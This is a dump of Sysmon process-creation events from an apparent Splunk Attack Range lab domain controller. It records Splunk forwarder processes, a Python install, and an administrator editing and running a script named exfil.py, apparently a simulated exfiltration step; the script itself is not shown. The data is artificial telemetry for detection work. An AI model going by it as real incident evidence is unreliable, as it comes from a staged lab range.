154100x800000000000000038679Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:40:21.084{A8622C2F-5055-6078-3907-00000000AE01}6964C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000038669Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:40:20.490{A8622C2F-5054-6078-3807-00000000AE01}5912C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000038660Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:40:19.812{A8622C2F-5053-6078-3707-00000000AE01}6656C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000038650Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:40:18.086{A8622C2F-5052-6078-3607-00000000AE01}3208C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000038640Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:40:17.419{A8622C2F-5051-6078-3507-00000000AE01}3788C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x800000000000000038631Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:40:16.758{A8622C2F-5050-6078-3407-00000000AE01}3820C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000038508Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:39:22.980{A8622C2F-501A-6078-3307-00000000AE01}6540C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000038492Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:39:21.151{A8622C2F-5019-6078-3207-00000000AE01}3788C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000038480Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:39:20.469{A8622C2F-5018-6078-3107-00000000AE01}4788C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000038471Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:39:19.805{A8622C2F-5017-6078-3007-00000000AE01}4968C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000038461Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:39:18.141{A8622C2F-5016-6078-2F07-00000000AE01}7020C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000038451Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:39:17.478{A8622C2F-5015-6078-2E07-00000000AE01}5904C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000038442Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:39:16.919{A8622C2F-5014-6078-2D07-00000000AE01}5908C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000038420Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:39:12.130{A8622C2F-5010-6078-2C07-00000000AE01}2352C:\Program Files\Notepad++\notepad++.exe7.95Notepad++ : a free (GPL) source code editorNotepad++Don HO don.h@free.frnotepad++.exe"C:\Program Files\Notepad++\notepad++.exe" "C:\temp\exfil.py"C:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=45833E3CFFD3716546665DCE0C343F2E,SHA256=5AEC02154C9A23F5D77B11853691449063AA0EF3988C4EB30048DEBBCEC8B947,IMPHASH=DE4B8987D5ADB218127887FA4130E9E8{A8622C2F-41CC-6078-CC03-00000000AE01}5260C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 154100x800000000000000038403Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:39:06.494{A8622C2F-500A-6078-2B07-00000000AE01}5976C:\Program Files\Python38\python.exe3.8.9PythonPythonPython Software Foundationpython.exepython exfil.pyC:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=249A55048751D0C77446657437C342B7,SHA256=5473F5813336283A44FEA373B2C84DCBAF5E7A337EE7A40883DEA3EF4C73A99A,IMPHASH=A1304C4778128720E89539BB55752E4C{A8622C2F-4FF5-6078-2807-00000000AE01}4740C:\Windows\System32\cmd.exe"cmd.exe" /s /k pushd "C:\temp" 154100x800000000000000038384Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:38:58.012{A8622C2F-5002-6078-2A07-00000000AE01}7120C:\Program Files\Python38\python.exe3.8.9PythonPythonPython Software 
Foundationpython.exepythonC:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=249A55048751D0C77446657437C342B7,SHA256=5473F5813336283A44FEA373B2C84DCBAF5E7A337EE7A40883DEA3EF4C73A99A,IMPHASH=A1304C4778128720E89539BB55752E4C{A8622C2F-4FF5-6078-2807-00000000AE01}4740C:\Windows\System32\cmd.exe"cmd.exe" /s /k pushd "C:\temp" 154100x800000000000000038341Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:38:45.584{A8622C2F-4FF5-6078-2807-00000000AE01}4740C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"cmd.exe" /s /k pushd "C:\temp"C:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-41CC-6078-CC03-00000000AE01}5260C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 154100x800000000000000038290Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:38:22.957{A8622C2F-4FDE-6078-2707-00000000AE01}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000038262Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:38:21.135{A8622C2F-4FDD-6078-2607-00000000AE01}6040C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000038252Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:38:20.465{A8622C2F-4FDC-6078-2507-00000000AE01}6424C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000038243Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:38:19.801{A8622C2F-4FDB-6078-2407-00000000AE01}7136C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" 
service 154100x800000000000000038213Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:38:18.541{A8622C2F-4FDA-6078-2107-00000000AE01}5632C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000038203Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:38:17.719{A8622C2F-4FD9-6078-2007-00000000AE01}5816C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000038192Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:38:16.913{A8622C2F-4FD8-6078-1F07-00000000AE01}5516C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000038063Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:37:53.239{A8622C2F-4FC1-6078-1E07-00000000AE01}6808C:\Program Files\Python38\python.exe3.8.9PythonPythonPython Software Foundationpython.exe"C:\Program Files\Python38\python.exe" -OO -E -s -Wi "C:\Program Files\Python38\Lib\compileall.py" -f -x "bad_coding|badsyntax|site-packages|py2_|lib2to3\\tests|venv\\scripts" "C:\Program Files\Python38\Lib"C:\ProgramData\Package Cache\A78D1C6FC532CD468C767506BCBB600C304D4DC0\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=249A55048751D0C77446657437C342B7,SHA256=5473F5813336283A44FEA373B2C84DCBAF5E7A337EE7A40883DEA3EF4C73A99A,IMPHASH=A1304C4778128720E89539BB55752E4C{A8622C2F-4FC1-6078-1C07-00000000AE01}5832C:\ProgramData\Package Cache\A78D1C6FC532CD468C767506BCBB600C304D4DC0\py.exe"C:\ProgramData\Package Cache\A78D1C6FC532CD468C767506BCBB600C304D4DC0\py.exe" -3.8 -OO -E -s -Wi "C:\Program Files\Python38\Lib\compileall.py" -f -x "bad_coding|badsyntax|site-packages|py2_|lib2to3\\tests|venv\\scripts" "C:\Program Files\Python38\Lib" 154100x800000000000000038050Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:37:53.210{A8622C2F-4FC1-6078-1C07-00000000AE01}5832C:\ProgramData\Package Cache\A78D1C6FC532CD468C767506BCBB600C304D4DC0\py.exe3.8.9PythonPythonPython Software Foundationpy.exe"C:\ProgramData\Package Cache\A78D1C6FC532CD468C767506BCBB600C304D4DC0\py.exe" -3.8 -OO -E -s -Wi "C:\Program Files\Python38\Lib\compileall.py" -f -x 
"bad_coding|badsyntax|site-packages|py2_|lib2to3\\tests|venv\\scripts" "C:\Program Files\Python38\Lib"C:\ProgramData\Package Cache\A78D1C6FC532CD468C767506BCBB600C304D4DC0\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=79C93996908FFDD05B18DC0D7DF1932E,SHA256=0BD3CBF4774123ACEFD938B257EBC89C17C4B476BA2420DF6951BC46D40D4C99,IMPHASH=934A502B70E6FF941EE6D20F8BC3B8EE{A8622C2F-4F9E-6078-0507-00000000AE01}3904C:\Windows\Temp\{18F4A599-FD78-4966-AC74-683EE580725A}\.be\python-3.8.9-amd64.exe"C:\Windows\Temp\{18F4A599-FD78-4966-AC74-683EE580725A}\.be\python-3.8.9-amd64.exe" -q -burn.elevated BurnPipe.{A2C04021-BA92-4509-80B0-07B5D4271B07} {57D5E1F0-BB75-405D-915C-CE3CD6E1784F} 2872 154100x800000000000000037895Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:37:45.961{A8622C2F-4FB9-6078-1807-00000000AE01}5196C:\Program Files\Python38\python.exe3.8.9PythonPythonPython Software Foundationpython.exe"C:\Program Files\Python38\python.exe" -O -E -s -Wi "C:\Program Files\Python38\Lib\compileall.py" -f -x "bad_coding|badsyntax|site-packages|py2_|lib2to3\\tests|venv\\scripts" "C:\Program Files\Python38\Lib"C:\ProgramData\Package Cache\A78D1C6FC532CD468C767506BCBB600C304D4DC0\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=249A55048751D0C77446657437C342B7,SHA256=5473F5813336283A44FEA373B2C84DCBAF5E7A337EE7A40883DEA3EF4C73A99A,IMPHASH=A1304C4778128720E89539BB55752E4C{A8622C2F-4FB9-6078-1607-00000000AE01}1536C:\ProgramData\Package Cache\A78D1C6FC532CD468C767506BCBB600C304D4DC0\py.exe"C:\ProgramData\Package Cache\A78D1C6FC532CD468C767506BCBB600C304D4DC0\py.exe" -3.8 -O -E -s -Wi "C:\Program Files\Python38\Lib\compileall.py" -f -x "bad_coding|badsyntax|site-packages|py2_|lib2to3\\tests|venv\\scripts" "C:\Program Files\Python38\Lib" 154100x800000000000000037882Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:37:45.932{A8622C2F-4FB9-6078-1607-00000000AE01}1536C:\ProgramData\Package Cache\A78D1C6FC532CD468C767506BCBB600C304D4DC0\py.exe3.8.9PythonPythonPython Software Foundationpy.exe"C:\ProgramData\Package Cache\A78D1C6FC532CD468C767506BCBB600C304D4DC0\py.exe" -3.8 -O -E -s -Wi "C:\Program Files\Python38\Lib\compileall.py" -f -x "bad_coding|badsyntax|site-packages|py2_|lib2to3\\tests|venv\\scripts" "C:\Program Files\Python38\Lib"C:\ProgramData\Package Cache\A78D1C6FC532CD468C767506BCBB600C304D4DC0\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=79C93996908FFDD05B18DC0D7DF1932E,SHA256=0BD3CBF4774123ACEFD938B257EBC89C17C4B476BA2420DF6951BC46D40D4C99,IMPHASH=934A502B70E6FF941EE6D20F8BC3B8EE{A8622C2F-4F9E-6078-0507-00000000AE01}3904C:\Windows\Temp\{18F4A599-FD78-4966-AC74-683EE580725A}\.be\python-3.8.9-amd64.exe"C:\Windows\Temp\{18F4A599-FD78-4966-AC74-683EE580725A}\.be\python-3.8.9-amd64.exe" -q -burn.elevated BurnPipe.{A2C04021-BA92-4509-80B0-07B5D4271B07} {57D5E1F0-BB75-405D-915C-CE3CD6E1784F} 2872 154100x800000000000000037848Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:37:38.505{A8622C2F-4FB2-6078-1507-00000000AE01}6684C:\Program Files\Python38\python.exe3.8.9PythonPythonPython Software Foundationpython.exe"C:\Program Files\Python38\python.exe" -E -s -Wi "C:\Program Files\Python38\Lib\compileall.py" -f -x "bad_coding|badsyntax|site-packages|py2_|lib2to3\\tests|venv\\scripts" "C:\Program Files\Python38\Lib"C:\ProgramData\Package Cache\A78D1C6FC532CD468C767506BCBB600C304D4DC0\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=249A55048751D0C77446657437C342B7,SHA256=5473F5813336283A44FEA373B2C84DCBAF5E7A337EE7A40883DEA3EF4C73A99A,IMPHASH=A1304C4778128720E89539BB55752E4C{A8622C2F-4FB2-6078-1307-00000000AE01}5508C:\ProgramData\Package Cache\A78D1C6FC532CD468C767506BCBB600C304D4DC0\py.exe"C:\ProgramData\Package Cache\A78D1C6FC532CD468C767506BCBB600C304D4DC0\py.exe" -3.8 -E -s -Wi 
"C:\Program Files\Python38\Lib\compileall.py" -f -x "bad_coding|badsyntax|site-packages|py2_|lib2to3\\tests|venv\\scripts" "C:\Program Files\Python38\Lib" 154100x800000000000000037835Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:37:38.463{A8622C2F-4FB2-6078-1307-00000000AE01}5508C:\ProgramData\Package Cache\A78D1C6FC532CD468C767506BCBB600C304D4DC0\py.exe3.8.9PythonPythonPython Software Foundationpy.exe"C:\ProgramData\Package Cache\A78D1C6FC532CD468C767506BCBB600C304D4DC0\py.exe" -3.8 -E -s -Wi "C:\Program Files\Python38\Lib\compileall.py" -f -x "bad_coding|badsyntax|site-packages|py2_|lib2to3\\tests|venv\\scripts" "C:\Program Files\Python38\Lib"C:\ProgramData\Package Cache\A78D1C6FC532CD468C767506BCBB600C304D4DC0\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=79C93996908FFDD05B18DC0D7DF1932E,SHA256=0BD3CBF4774123ACEFD938B257EBC89C17C4B476BA2420DF6951BC46D40D4C99,IMPHASH=934A502B70E6FF941EE6D20F8BC3B8EE{A8622C2F-4F9E-6078-0507-00000000AE01}3904C:\Windows\Temp\{18F4A599-FD78-4966-AC74-683EE580725A}\.be\python-3.8.9-amd64.exe"C:\Windows\Temp\{18F4A599-FD78-4966-AC74-683EE580725A}\.be\python-3.8.9-amd64.exe" -q -burn.elevated BurnPipe.{A2C04021-BA92-4509-80B0-07B5D4271B07} {57D5E1F0-BB75-405D-915C-CE3CD6E1784F} 2872 154100x800000000000000037728Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:37:33.361{A8622C2F-4FAD-6078-1207-00000000AE01}6012C:\Program Files\Python38\python.exe3.8.9PythonPythonPython Software Foundationpython.exe"C:\Program Files\Python38\python.exe" -c " import runpy import sys sys.path = ['C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\tmpjgat20w4\\setuptools-49.2.1-py3-none-any.whl', 'C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\tmpjgat20w4\\pip-20.2.3-py2.py3-none-any.whl'] + sys.path sys.argv[1:] = ['install', '--no-cache-dir', '--no-index', '--find-links', 'C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\tmpjgat20w4', '--upgrade', 'setuptools', 'pip'] 
